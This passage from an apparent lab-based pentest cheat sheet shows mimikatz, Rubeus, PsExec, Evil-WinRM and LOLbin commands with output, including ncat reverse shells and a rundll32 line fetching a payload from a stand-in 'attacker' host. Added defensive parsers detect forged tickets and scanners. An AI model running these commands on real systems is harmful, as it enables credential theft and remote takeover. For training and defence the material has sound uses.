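On the DC side the same forged ticket surfaces in Event 4769 (service ticket requested) under whatever client name the PAC carries, which is why a golden ticket built with a non-existent /admin name, like the silver ticket below, produces 4769 events for an account the directory does not contain.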
    
    
    # Generate a Silver ticket for the CIFS service on the target. The ticket must be encrypted with the key of the account that runs the service (for CIFS, the target's computer account). The "successfully submitted" message below only confirms injection into the local ticket cache; whether the target accepts the ticket depends entirely on that key, so a ticket built from another account's hash (for example an SQL service account's) is injected fine but rejected at the share.
    kerberos::golden /admin:StillNotALegitAccountEither /domain:CONTROLLER.local /id:500 /sid:S-1-5-21-432953485-3795405108-1502158860 /target:controller-1.local /rc4:cd40c9ed96265531b21fc5b1dafcfb0a /service:cifs /ptt
    
    User      : StillNotALegitAccountEither
    Domain    : CONTROLLER.local (CONTROLLER)
    SID       : S-1-5-21-432953485-3795405108-1502158860
    User Id   : 500
    Groups Id : *513 512 520 518 519
    ServiceKey: cd40c9ed96265531b21fc5b1dafcfb0a - rc4_hmac_nt
    Service   : cifs
    Target    : controller-1.local
    Lifetime  : 10/25/2025 3:41:06 AM ; 10/23/2035 3:41:06 AM ; 10/23/2035 3:41:06 AM
    -> Ticket : ** Pass The Ticket **
    
     * PAC generated
     * PAC signed
     * EncTicketPart generated
     * EncTicketPart encrypted
     * KrbCred generated
    
    Golden ticket for 'StillNotALegitAccountEither @ CONTROLLER.local' successfully submitted for current session
    
    mimikatz #
    
    
    # DC-Sync All
    mimikatz # lsadump::dcsync /domain:controller.local /all
    [DC] 'controller.local' will be the domain
    [DC] 'CONTROLLER-1.CONTROLLER.local' will be the DC server
    [DC] Exporting domain 'controller.local'
    
    Object RDN           : CONTROLLER
    
    
    Object RDN           : LostAndFound
    
    [...]
    
    ** SAM ACCOUNT **
    
    SAM Username         : Guest
    User Account Control : 00010222 ( ACCOUNTDISABLE PASSWD_NOTREQD NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
    Object Security ID   : S-1-5-21-432953485-3795405108-1502158860-501
    Object Relative ID   : 501
    
    Credentials:
    
    Object RDN           : Builtin
    
    
    Object RDN           : S-1-5-4
    
    
    Object RDN           : S-1-5-11
    
    
    Object RDN           : Remote Desktop Users
    
    ** SAM ACCOUNT **
    
    SAM Username         : Remote Desktop Users
    Object Security ID   : S-1-5-32-555
    Object Relative ID   : 555
    
    Credentials:
    
    Object RDN           : Network Configuration Operators
    
    [...]
    
    # Prepare for overpass-the-hash (RC4-hash) and pass-the-key (AES-key)
    mimikatz # sekurlsa::ekeys
    
    Authentication Id : 0 ; 288048 (00000000:00046530)
    Session           : RemoteInteractive from 2
    User Name         : Administrator
    Domain            : CONTROLLER
    Logon Server      : CONTROLLER-1
    Logon Time        : 10/22/2025 8:08:33 AM
    SID               : S-1-5-21-432953485-3795405108-1502158860-500
    
           * Username : Administrator
           * Domain   : CONTROLLER.LOCAL
           * Password : (null)
           * Key List :
             aes256_hmac       42b3c13c8c0fef3175eb2b5926f805f919123efd001a9c5a16ee9a86101e32b4
             rc4_hmac_nt       2777b7fec870e04dda00cd7260f7bee6
             rc4_hmac_old      2777b7fec870e04dda00cd7260f7bee6
             rc4_md4           2777b7fec870e04dda00cd7260f7bee6
             rc4_hmac_nt_exp   2777b7fec870e04dda00cd7260f7bee6
             rc4_hmac_old_exp  2777b7fec870e04dda00cd7260f7bee6
    
    Authentication Id : 0 ; 243593 (00000000:0003b789)
    [...]
    
    
    # Pass-the-key attack
    # Note the use of the aes256 key
    sekurlsa::pth /user:Administrator /domain:controller.local /aes256:42b3c13c8c0fef3175eb2b5926f805f919123efd001a9c5a16ee9a86101e32b4 /run:"c:\Users\Administrator\Downloads\ncat.exe -e cmd.exe 10.10.177.75 5556"
    user    : Administrator
    domain  : controller.local
    program : c:\Users\Administrator\Downloads\ncat.exe -e cmd.exe 10.10.177.75 5556
    impers. : no
    AES256  : 42b3c13c8c0fef3175eb2b5926f805f919123efd001a9c5a16ee9a86101e32b4
      |  PID  1652
      |  TID  3520
      |  LSA Process is now R/W
      |  LUID 0 ; 2299698 (00000000:00231732)
      \_ msv1_0   - data copy @ 0000018F801560F0 : OK !
      \_ kerberos - data copy @ 0000018F83F33788
      \_ aes256_hmac       OK
       \_ aes128_hmac       -> null
       \_ rc4_hmac_nt       -> null
       \_ rc4_hmac_old      -> null
       \_ rc4_md4           -> null
       \_ rc4_hmac_nt_exp   -> null
       \_ rc4_hmac_old_exp  -> null
       \_ *Password replace @ 0000018F83E810C8 (32) -> null
    
    mimikatz #
    
    
    # Overpass-the-hash attack
    # Note the use of the RC4 key - basically the NTLM hash
    
    sekurlsa::pth /user:Administrator /domain:controller.local /rc4:2777b7fec870e04dda00cd7260f7bee6 /run:"c:\Users\Administrator\Downloads\ncat.exe -e cmd.exe 10.10.177.75 5557"
    user    : Administrator
    domain  : controller.local
    program : c:\Users\Administrator\Downloads\ncat.exe -e cmd.exe 10.10.177.75 5557
    impers. : no
    NTLM    : 2777b7fec870e04dda00cd7260f7bee6
      |  PID  1556
      |  TID  4520
      |  LSA Process was already R/W
      |  LUID 0 ; 2390443 (00000000:002479ab)
      \_ msv1_0   - data copy @ 0000018F801577A0 : OK !
      \_ kerberos - data copy @ 0000018F83F345E8
       \_ aes256_hmac       -> null
       \_ aes128_hmac       -> null
       \_ rc4_hmac_nt       OK
       \_ rc4_hmac_old      OK
       \_ rc4_md4           OK
       \_ rc4_hmac_nt_exp   OK
       \_ rc4_hmac_old_exp  OK
       \_ *Password replace @ 0000018F83E7E428 (32) -> null
    
    mimikatz #
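
The two ticket listings above carry the signals a defender keys on when hunting forged tickets: a ten-year lifetime and renew-until where Windows' default policy allows 10 hours and 7 days, and a TGT encrypted with RC4 in a domain whose real accounts hold AES keys (compare the `sekurlsa::ekeys` output further down). The parser below is an added example written for this page, not code from mimikatz or from the post's author. Its sample text reuses the golden-ticket entry shown above and adds a second, normal-looking TGT made up for comparison; the policy limits are assumptions to be replaced with the domain's own GPO values.

```python
import re
from datetime import datetime, timedelta

# Constructed sample for this example: the golden-ticket entry from the
# mimikatz output above, plus a second, normal-looking TGT made up here
# for comparison. Neither block is live data.
SAMPLE_TICKET_LIST = """\
[00000000] - 0x00000017 - rc4_hmac_nt
 Start/End/MaxRenew: 10/22/2025 7:51:52 AM ; 10/20/2035 7:51:52 AM ; 10/20/2035 7:51:52 AM
 Server Name       : krbtgt/CONTROLLER.LOCAL @ CONTROLLER.LOCAL
 Client Name       : Administrator @ CONTROLLER.LOCAL
 Flags 40e00000    : pre_authent ; initial ; renewable ; forwardable ;

[00000001] - 0x00000012 - aes256_hmac
 Start/End/MaxRenew: 10/22/2025 8:08:33 AM ; 10/22/2025 6:08:33 PM ; 10/29/2025 8:08:33 AM
 Server Name       : krbtgt/CONTROLLER.LOCAL @ CONTROLLER.LOCAL
 Client Name       : jdoe @ CONTROLLER.LOCAL
 Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
"""

# Windows default Kerberos policy: 10 h ticket lifetime, 7 d renewal.
# Assumption for this example; use the values from the domain's own GPO.
DEFAULT_MAX_TICKET_LIFE = timedelta(hours=10)
DEFAULT_MAX_RENEW_LIFE = timedelta(days=7)

TS_FORMAT = "%m/%d/%Y %I:%M:%S %p"

HEADER_RE = re.compile(r"^\s*\[(\w+)\]\s*-\s*(0x[0-9a-fA-F]+)\s*-\s*(\S+)")
TIMES_RE = re.compile(r"^\s*Start/End/MaxRenew:\s*(.+?)\s*;\s*(.+?)\s*;\s*(.+?)\s*$")
NAME_RE = re.compile(r"^\s*(Server|Client) Name\s*:\s*(.+?)\s*$")


def parse_ticket_list(text):
    """Turn a mimikatz ticket listing into dicts with etype/start/end/renew/server/client."""
    tickets = []
    current = None
    for line in text.splitlines():
        m = HEADER_RE.match(line)
        if m:
            current = {"index": m.group(1), "etype": m.group(3), "server": "", "client": ""}
            tickets.append(current)
            continue
        if current is None:
            continue
        m = TIMES_RE.match(line)
        if m:
            current["start"], current["end"], current["renew"] = (
                datetime.strptime(v, TS_FORMAT) for v in m.groups()
            )
            continue
        m = NAME_RE.match(line)
        if m:
            current[m.group(1).lower()] = m.group(2)
    return tickets


def flag_forged_ticket_indicators(tickets, max_life=DEFAULT_MAX_TICKET_LIFE,
                                  max_renew=DEFAULT_MAX_RENEW_LIFE):
    """Return [(client, [reasons])] for tickets a policy-abiding KDC would not have issued."""
    findings = []
    for t in tickets:
        if "end" not in t:          # header without a Start/End/MaxRenew line
            continue
        reasons = []
        if t["end"] - t["start"] > max_life:
            reasons.append(f"lifetime {t['end'] - t['start']} exceeds policy {max_life}")
        if t["renew"] - t["start"] > max_renew:
            reasons.append(f"renew-until {t['renew'] - t['start']} exceeds policy {max_renew}")
        # A TGT encrypted with RC4 in an AES-capable domain is a classic forgery tell:
        # the golden-ticket command above was given the RC4 (/krbtgt) hash, not /aes256.
        if t["server"].startswith("krbtgt/") and t["etype"].startswith("rc4"):
            reasons.append("TGT encrypted with RC4 rather than AES")
        if reasons:
            findings.append((t["client"], reasons))
    return findings


if __name__ == "__main__":
    for client, reasons in flag_forged_ticket_indicators(parse_ticket_list(SAMPLE_TICKET_LIST)):
        print(client, "->", "; ".join(reasons))
```

The same three checks apply to tickets pulled from a live host with `klist` or from 4768/4769 event data, once the timestamps are normalised to the format above; the RC4 check only makes sense in a domain that has actually moved its krbtgt and service accounts to AES.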
    
    

14. Rubeus

  • Use Case: Kerberos attacks (AS-REP roast, kerberoast, ticket ops). Github

  • Input Example:

    Rubeus.exe kerberoast
    
    Rubeus.exe asreproast /domain:controller.local /dc:10.10.106.82
    
    Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to> /domain:za.tryhackme.loc /dc:<IP of domain controller>
    
    Rubeus.exe brute </password:PASSWORD | /passwords:PASSWORDS_FILE> [/user:USER | /users:USERS_FILE] [/domain:DOMAIN] [/creduser:DOMAIN\\USER & /credpassword:PASSWORD] [/ou:ORGANIZATION_UNIT] [/dc:DOMAIN_CONTROLLER] [/outfile:RESULT_PASSWORD_FILE] [/noticket] [/verbose] [/nowrap]
    
  • Output Example:

    [*] Action: Kerberoasting
    
    [*] NOTICE: AES hashes will be returned for AES-enabled accounts.
    [*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
    
    [*] Searching the current domain for Kerberoastable users
    
    [*] Total kerberoastable users : 2
    
    
    [*] SamAccountName         : SQLService
    [*] DistinguishedName      : CN=SQLService,CN=Users,DC=CONTROLLER,DC=local
    [*] ServicePrincipalName   : CONTROLLER-1/SQLService.CONTROLLER.local:30111
    [*] PwdLastSet             : 5/25/2020 10:28:26 PM
    [*] Supported ETypes       : RC4_HMAC_DEFAULT
    [*] Hash                   : $krb5tgs$23$*SQLService$CONTROLLER.local$CONTROLLER-1/SQLService.CONTROLLER.loca
                               l:30111*$9CEAC4D28E5F22C73262175A7786CAED$07F27F494F52F0CB6CA43246773162C2A753DB
                               34FF08AB7D9547B211138B07E7969628FA5FD65F89B99A2A8449C8CFFD56B8B98903B74F01AF69A5
                               B9F39F0BD3CAC4CB2E310CDF63624CADFD827B112B736E3E42A99AD0568C10FFF482D2411D4F9385
                               B0A1AEF8E189D869854B2F5F24B41034510A4EFA86F38E997687809701A5A6423DE0DC2D19D9F425
                               043FDE54A46E682D95B554D89AEBF7ED450966431CABF74EF81879BBC7D38D6CB8FB82EE6B622400
                               F6F80AD5690E0CB8DBDB6736C2D4FED2F81837109924340373C84AD567D5442D36E4CBA10CD175CC
                               D7B7A9F846AEAE0338E9E7B65312FCEB3D6DCADCFC1E28DAC48FF2A2292E8C3DF9CBE87C66318BD8
                               40B49DC5616123EB4868F799D2B08491FD518ADB19DD5DD2733E1A4378097CB8857D403C3035B0FB
                               CB5C2D945560FD6D681D825FFD2AE413962604769A9EECEBDE899AE4EF6AF685F411C857779F9AC9
                               [...]
    
    
    [*] Action: AS-REP roasting
    
    [*] Target Domain          : controller.local
    [*] Target DC              : 10.10.106.82
    
    [*] Searching path 'LDAP://10.10.106.82/DC=controller,DC=local' for AS-REP roastable users
    [*] SamAccountName         : Admin2
    [*] DistinguishedName      : CN=Admin-2,CN=Users,DC=CONTROLLER,DC=local
    [*] Using domain controller: 10.10.106.82
    [*] Building AS-REQ (w/o preauth) for: 'controller.local\Admin2'
    [+] AS-REQ w/o preauth successful!
    [*] AS-REP hash:
    
        [email protected]:AEA5D810944F4838B91514AD1A79F57E$549ADA96785D
        42B41B8DC1E033E7B8CA300850BACDB0D4860042B9484234DEDB1F2AEE4CF8C825FBCCC44B04E3E1
        D9B482F43735BBA04A0636DDF5A360D7185EA84B7539BAE2D5BEA88ACCD6237100F2417A5E12C824
        D723E78E914BE4D789CEA1719C0F0852B6554D493CB06E2BB9759826A52F5F917EF0814765F96430
        21601A4F54902F8CC53705105787AC2832F505ADE8233AEBB8F1365DCE8EE73310C365415DE68260
        58BA9D8D5844EEF0A7E70987773EE942B109D80468078A3CE37F2321017F776940EF8BB346CE94B1
        6C97C771E1FAB782E3D7DE12F5E42BD505DE0C2B4D818286FC78F5EFB65C51BE0081900C3C71
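
The hash headers in the Kerberoast and AS-REP roast output above are structured: `$krb5tgs$<etype>$*<user>$<realm>$<spn>*$...` for a service ticket (the `*` moves to wrap the SPN for etype 17/18, which is what the `NOTICE` about AES hashes refers to) and `$krb5asrep$[<etype>$]<user>@<realm>:...` for an AS-REP. A blue team receiving a pentest report can triage that list directly: every etype-23 entry is a service account still accepting RC4, and every AS-REP entry is an account with pre-authentication disabled. The parser below is an added example written for this page, not part of Rubeus or of the post's author's material; its sample hashes follow the layout shown above but the hex material is made up and truncated, and the AS-REP etype is assumed to be 23 when the header omits it.

```python
import re

# Constructed samples for this example: same header layout as the Rubeus
# output above, but the checksum/ciphertext hex is made up and truncated.
SAMPLE_ROAST_OUTPUT = [
    "$krb5tgs$23$*SQLService$CONTROLLER.local$CONTROLLER-1/SQLService.CONTROLLER.local:30111*"
    "$00112233445566778899aabbccddeeff$0f0e0d0c0b0a09080706050403020100",
    "$krb5tgs$18$svc_web$CONTROLLER.local$*HTTP/web01.controller.local*"
    "$0f1e2d3c4b5a69788796a5b4$c0ffee00c0ffee00c0ffee00",
    "$krb5asrep$Admin2@controller.local:aea5d810944f4838b91514ad1a79f57e$549ada96785d42b4",
    "$krb5asrep$23$jdoe@controller.local:ffeeddccbbaa99887766554433221100$1020304050607080",
]

ETYPE_NAMES = {
    "23": "RC4-HMAC",
    "17": "AES128-CTS-HMAC-SHA1-96",
    "18": "AES256-CTS-HMAC-SHA1-96",
}

# $krb5tgs$<etype>$*<user>$<realm>$<spn>*$<checksum>$<edata>   (etype 23)
# $krb5tgs$<etype>$<user>$<realm>$*<spn>*$<checksum>$<edata>   (etype 17/18)
TGS_RE = re.compile(
    r"^\$krb5tgs\$(\d+)\$\*?([^$]+)\$([^$]+)\$\*?([^*]+)\*\$([0-9a-fA-F]+)\$([0-9a-fA-F]+)$"
)
# $krb5asrep$[<etype>$]<user>@<realm>:<checksum>$<edata>
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?:(\d+)\$)?([^@$]+)@([^:]+):([0-9a-fA-F]+)\$([0-9a-fA-F]+)$"
)


def parse_roast_hash(line):
    """Split one hash line into its fields; returns None for anything that is not a roast hash."""
    line = line.strip()
    m = TGS_RE.match(line)
    if m:
        etype, user, realm, spn, checksum, edata = m.groups()
        return {"kind": "kerberoast", "etype": etype, "user": user, "realm": realm, "spn": spn,
                "checksum_bytes": len(checksum) // 2, "edata_bytes": len(edata) // 2}
    m = ASREP_RE.match(line)
    if m:
        etype, user, realm, checksum, edata = m.groups()
        # Assumption: a header without an explicit etype is the RC4 (23) form.
        return {"kind": "asreproast", "etype": etype or "23", "user": user, "realm": realm,
                "spn": None, "checksum_bytes": len(checksum) // 2, "edata_bytes": len(edata) // 2}
    return None


def triage(lines):
    """Map each hash to the hardening step that removes the account from the roastable set."""
    actions = []
    for line in lines:
        h = parse_roast_hash(line)
        if h is None:
            continue
        etype_name = ETYPE_NAMES.get(h["etype"], f"etype {h['etype']}")
        if h["kind"] == "asreproast":
            action = "re-enable Kerberos pre-authentication (DONT_REQ_PREAUTH is set on the account)"
        elif h["etype"] == "23":
            action = ("restrict msDS-SupportedEncryptionTypes to AES and move the SPN to a gMSA "
                      "or a long random password")
        else:
            action = "AES ticket; keep the password long and random (or use a gMSA) so cracking stays infeasible"
        actions.append({"user": h["user"], "realm": h["realm"], "kind": h["kind"],
                        "etype": etype_name, "action": action})
    return actions


if __name__ == "__main__":
    for a in triage(SAMPLE_ROAST_OUTPUT):
        print(f"{a['kind']:<11} {a['user']}@{a['realm']} [{a['etype']}] -> {a['action']}")
```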
    
    

15. Certify

  • Use Case: AD CS enumeration & misconfiguration abuse (ESC1–ESC8).

  • Input Example:

    Certify.exe find /vulnerable
    
  • Output Example:

    Vulnerable template found: User Enrollment (ENROLLEE_SUPPLIES_SUBJECT)
    

16. Seatbelt

  • Use Case: Windows situational awareness (privs, AV, creds in files). Github

  • Input Example: Extended Group All Output

    .\Seatbelt.exe -group=User
    
  • Output Example:

    ====== azuread ======
    
      Could not enumerate NetAadJoinInfo
      SeamlessSignOnDomainTrusted : (not configured)
    ====== Certificates ======
    
      StoreLocation      : CurrentUser
      Issuer             : OU=EFS File Encryption Certificate, L=EFS, CN=Administrator
      Subject            : OU=EFS File Encryption Certificate, L=EFS, CN=Administrator
      ValidDate          : 5/25/2020 3:11:37 PM
      ExpiryDate         : 5/1/2120 3:11:37 PM
      HasPrivateKey      : True
      KeyExportable      : False
      Thumbprint         : 425951D040D3E06FBE08F8364239D64B6EAF95E8
      EnhancedKeyUsages  :
         File Recovery
    
    ====== CertificateThumbprints ======
    [...]
    CurrentUser\TrustedPeople - 425951D040D3E06FBE08F8364239D64B6EAF95E8 (Administrator) 5/1/2120 3:11:37 PM
    
    ====== ChromiumPresence ======
    
    ====== CloudCredentials ======
    
    ====== CloudSyncProviders ======
    
    ====== CredEnum ======
    
    ====== dir ======
    
    LastAccess LastWrite  Size      Path
    [...]
    25-10-22   25-10-22   682.5KB   C:\Users\Administrator\Documents\Seatbelt.exe
    25-10-22   25-10-22   3.1KB     C:\Users\Administrator\Documents\seatbelt_output.txt
    
    ====== DpapiMasterKeys ======
    
    Folder : C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-432953485-3795405108-1502158860-500
    
      LastAccessed              LastModified              FileName
      ------------              ------------              --------
      1/3/2021 7:28:18 AM       1/3/2021 7:28:18 AM       59ef089e-15fb-408d-bbdb-675d5d0a9128
      5/25/2020 3:11:37 PM      5/25/2020 3:11:37 PM      5b6373ac-26de-40ad-b718-b28de198c6a1
    
    [*] Use the Mimikatz "dpapi::masterkey" module with appropriate arguments (/pvk or /rpc) to decrypt
    [*] You can also extract many DPAPI masterkeys from memory with the Mimikatz "sekurlsa::dpapi" module
    [*] You can also use SharpDPAPI for masterkey retrieval.
    
    ====== ExplorerMRUs ======
    
    ====== ExplorerRunCommands ======
    
    ====== FileZilla ======
    
    ====== FirefoxPresence ======
    
    ====== IdleTime ======
    
    CurrentUser : CONTROLLER\Administrator
    Idletime    : 01h:06m:07s:125ms (3967125 milliseconds)
    
    ====== IEFavorites ======
    
    Favorites (Administrator):
    
      http://go.microsoft.com/fwlink/p/?LinkId=255142
    
    ====== IETabs ======
    
    ====== IEUrls ======
    
    Internet Explorer typed URLs for the last 7 days
    
    ====== KeePass ======
    
    ====== MappedDrives ======
    
    Mapped Drives (via WMI)
    
    ====== MTPuTTY ======
    
    ====== OfficeMRUs ======
    
    Enumerating Office most recently used files for the last 7 days
    
    App       User                     LastAccess    FileName
    ---       ----                     ----------    --------
    
    ====== OneNote ======
    
      OneNote files (Administrator):
    
    ====== OracleSQLDeveloper ======
    
    ====== PowerShellHistory ======
    
    ====== PuttyHostKeys ======
    
    ====== PuttySessions ======
    
    ====== RDCManFiles ======
    
    ====== RDPSavedConnections ======
    
    ====== SecPackageCreds ======
    
    ====== SlackDownloads ======
    
    ====== SlackPresence ======
    
    ====== SlackWorkspaces ======
    
    ====== SuperPutty ======
    
    ====== TokenGroups ======
    
    Current Token's Groups
    
    CONTROLLER\Domain Users                  S-1-5-21-432953485-3795405108-1502158860-513
    Everyone                                 S-1-1-0
    BUILTIN\Administrators                   S-1-5-32-544
    BUILTIN\Users                            S-1-5-32-545
    BUILTIN\Pre-Windows 2000 Compatible Access S-1-5-32-554
    NT AUTHORITY\NETWORK                     S-1-5-2
    NT AUTHORITY\Authenticated Users         S-1-5-11
    NT AUTHORITY\This Organization           S-1-5-15
    CONTROLLER\Group Policy Creator Owners   S-1-5-21-432953485-3795405108-1502158860-520
    CONTROLLER\Domain Admins                 S-1-5-21-432953485-3795405108-1502158860-512
    CONTROLLER\Enterprise Admins             S-1-5-21-432953485-3795405108-1502158860-519
    CONTROLLER\Schema Admins                 S-1-5-21-432953485-3795405108-1502158860-518
    CONTROLLER\Denied RODC Password Replication Group S-1-5-21-432953485-3795405108-1502158860-572
    NT AUTHORITY\NTLM Authentication         S-1-5-64-10
    
    ====== WindowsCredentialFiles ======
    
    ====== WindowsVault ======
    
    Vault GUID     : 4bf4c442-9b8a-41a0-b380-dd4a704ddb28
    Vault Type     : Web Credentials
    Item count     : 0
    
    [*] Completed collection in 1.491 seconds 
    
    

17. PsExec

Ports: 

  • 445/TCP (SMB)

💡Required Group Memberships: Administrators

  • Use Case: Remote command execution via SMB/Service Control Manager. Sysinternals

  • Impacket PsExec.py

  • Input Example:

    psexec.py ACME/jdoe:'P@ssw0rd'@10.10.10.30 cmd.exe /c whoami
    
    # Run process under a local system account with -s
    PsExec64.exe -s cmd.exe
    
    # Perform pass-the-key to get a reverse shell as t1_toby.beck
    sekurlsa::pth /user:t1_toby.beck /domain:za /aes256:6a0d48f79acaec013d928d84a102b72028d574340b6139e876e179db48fbde4e /run:"c:\tools\nc64.exe -e cmd.exe 10.150.74.4 4444"
    
    # From the reverse shell  
    PsExec64.exe \\THMIIS.za.tryhackme.com cmd.exe /c "whoami"
    
    
  • Output Example:

    nt authority\system
    
    PsExec v2.34 - Execute processes remotely
    Copyright (C) 2001-2021 Mark Russinovich
    Sysinternals - www.sysinternals.com
    
    za\t1_toby.beck
    
    Starting cmd.exe on THMIIS.za.tryhackme.com...
    cmd.exe exited on THMIIS.za.tryhackme.com with error code 0.
    
    c:\tools>
    
    

18. Evil‑WinRM

  • Use Case: WinRM shell for post‑exploitation (PowerShell remoting). Github

  • Input Example:

    evil-winrm -i 10.10.241.34 -u thmuser1 -p Password321
    
    evil-winrm -i 10.10.241.34 -u Administrator -H f3118544a831e728781d780cfdb9c1fa
    
  • Output Example:

    Evil-WinRM shell v3.4
    
    Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
    
    Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion 
    
    Info: Establishing connection to remote endpoint
    
    *Evil-WinRM* PS C:\Users\thmuser1\Documents>
    
    
    # From an Evil-WinRM shell, you can upload executables, e.g. Seatbelt
    *Evil-WinRM* PS C:\Users\Administrator\Documents> upload Seatbelt.exe
    
    

19. LOLbins

  • Use Case: Abuse built‑in Windows binaries to evade detection. LOLBins expanded

  • Input Example:

    rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";document.write();GetObject("script:https://attacker/payload.sct")
    
  • Output Example:

    (No stdout; payload executed via LOLBin)
    

20. Zed Attack Proxy (ZAP)

  • Use Case: Intercepting proxy, spidering, active/passive scanning.

  • Input Example:

    zap-baseline.py -t https://app.example.com -r zap-report.html
    
  • Output Example:

    Alerts: X-Content-Type-Options missing (Medium), Reflected XSS (High)
    

21. Postman

  • Use Case: (GUI-based) API exploration, auth testing, crafting requests.

  • Input Example:
    Import OpenAPI → Set env vars → Send

    POST /api/login
    with JSON body.

  • Output Example:

    200 OK
    {"token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."}
    

22. Gobuster / DirBuster

  • Use Case: Content discovery (dirs/files/vhosts). Github

  • Input Example:

    gobuster dir -u 10.10.175.232 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
    
    # Folder names are case sensitive
    gobuster dir -u 10.10.175.232/Changes -w /usr/share/wordlists/dirb/extensions_common.txt -x js,conf
    
    # Append-domain needed for vhost enumeration to work successfully
    gobuster vhost -u http://webenum.thm -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain
    
    gobuster fuzz -u http://webenum.thm -H "Host: FUZZ.webenum.thm" -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
    
  • Output Example:

    ===============================================================
    Gobuster v3.6
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
    ===============================================================
    [+] Url:                     http://10.10.175.232
    [+] Method:                  GET
    [+] Threads:                 10
    [+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
    [+] Negative Status codes:   404
    [+] User Agent:              gobuster/3.6
    [+] Timeout:                 10s
    ===============================================================
    Starting gobuster in directory enumeration mode
    ===============================================================
    /images               (Status: 301) [Size: 315] [--> http://10.10.175.232/images/]
    /public               (Status: 301) [Size: 315] [--> http://10.10.175.232/public/]
    /css                  (Status: 301) [Size: 312] [--> http://10.10.175.232/css/]
    /js                   (Status: 301) [Size: 311] [--> http://10.10.175.232/js/]
    /Changes              (Status: 301) [Size: 316] [--> http://10.10.175.232/Changes/]
    /VIDEO                (Status: 301) [Size: 314] [--> http://10.10.175.232/VIDEO/]
    Progress: 218275 / 218276 (100.00%)
    ===============================================================
    Finished
    ===============================================================
    
    
    Gobuster v3.6
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
    ===============================================================
    [+] Url:                     http://10.10.175.232/Changes
    [+] Method:                  GET
    [+] Threads:                 10
    [+] Wordlist:                /usr/share/wordlists/dirb/extensions_common.txt
    [+] Negative Status codes:   404
    [+] User Agent:              gobuster/3.6
    [+] Extensions:              conf,js
    [+] Timeout:                 10s
    ===============================================================
    Starting gobuster in directory enumeration mode
    ===============================================================
    /.htm                 (Status: 403) [Size: 278]
    /.html.js             (Status: 403) [Size: 278]
    /.html                (Status: 403) [Size: 278]
    /.html.conf           (Status: 403) [Size: 278]
    /.htm.conf            (Status: 403) [Size: 278]
    /.htm.js              (Status: 403) [Size: 278]
    /.php                 (Status: 403) [Size: 278]
    /.phtml               (Status: 403) [Size: 278]
    /                     (Status: 200) [Size: 1365]
    Progress: 87 / 90 (96.67%)
    ===============================================================
    Finished
    ===============================================================
    
    
    ===============================================================
    Starting gobuster in VHOST enumeration mode
    ===============================================================
    Found: learning.webenum.thm Status: 200 [Size: 13245]
    Found: products.webenum.thm Status: 200 [Size: 4941]
    Progress: 4997 / 4998 (99.98%)
    ===============================================================
    Finished
    ===============================================================
    
    

23. Wfuzz

  • Use Case: Web fuzzing/brute forcing parameters. Github

  • Input Example:

    wfuzz -c -z file,/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --hc 404 http://10.80.176.154/FUZZ/
    
    Common flags:
    
    --hc 404: hide responses with HTTP status code 404
    --hw 0: hide responses with 0 words
    --hs "Invalid": hide responses with "Invalid"
    -H "Host: FUZZ.target.com": fuzz for virtual hosts    
    
    wfuzz -c -z file,/usr/share/wordlists/usernames.txt -z file,/usr/share/wordlists/passwords.txt -d "username=FUZZ&password=FUZ2Z" --hc 302 http://target.com/login.php
    
    -d:   post data for login form brute-forcing  
    
  • Output Example:

    
      ********************************************************
      * Wfuzz 3.1.0 - The Web Fuzzer                         *
      ********************************************************
    
      Target: http://smol.thm/FUZZ/
      Total requests: 220560
    
      =====================================================================
      ID           Response   Lines    Word       Chars       Payload                                           
      =====================================================================
      [...]          
      000000241:   200        0 L      0 W        0 Ch        "wp-content"
      000000011:   301        0 L      0 W        0 Ch        "# Priority ordered case-sensitive list, where entries were found"                                  
      000000786:   200        283 L    2888 W     59671 Ch    "wp-includes"
      000007180:   302        0 L      0 W        0 Ch        "wp-admin"
      [...]
      Total time: 386.0505
      Processed Requests: 220560
      Filtered Requests: 220540
      Requests/sec.: 571.3241
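
Both Gobuster (22) and Wfuzz (23) leave the same footprint on the target: hundreds of requests per second from one client, the overwhelming majority answered 404 (Gobuster's banner even reports its default `User Agent: gobuster/3.6`). The detector below is an added example written for this page, not code from either tool or from the post's author. It parses combined-format access log lines, measures the peak number of 404s any one client produces inside a sliding window, and corroborates with known scanner user agents; the log lines, the `Wfuzz/` agent prefix and the 20-in-10-seconds threshold are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache/nginx "combined" access log line, e.g.
# 10.10.14.5 - - [09/Nov/2025:13:36:00 +0000] "GET /dir00 HTTP/1.1" 404 278 "-" "gobuster/3.6"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"

# Default user agents: gobuster's is visible in its banner above; "Wfuzz/" and
# "DirBuster" are assumptions. An operator can change all of them with one flag,
# so treat a match as corroboration, never as the primary signal.
SCANNER_UA_PREFIXES = ("gobuster/", "Wfuzz/", "DirBuster")


def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FORMAT)
    rec["status"] = int(rec["status"])
    return rec


def peak_in_window(timestamps, window):
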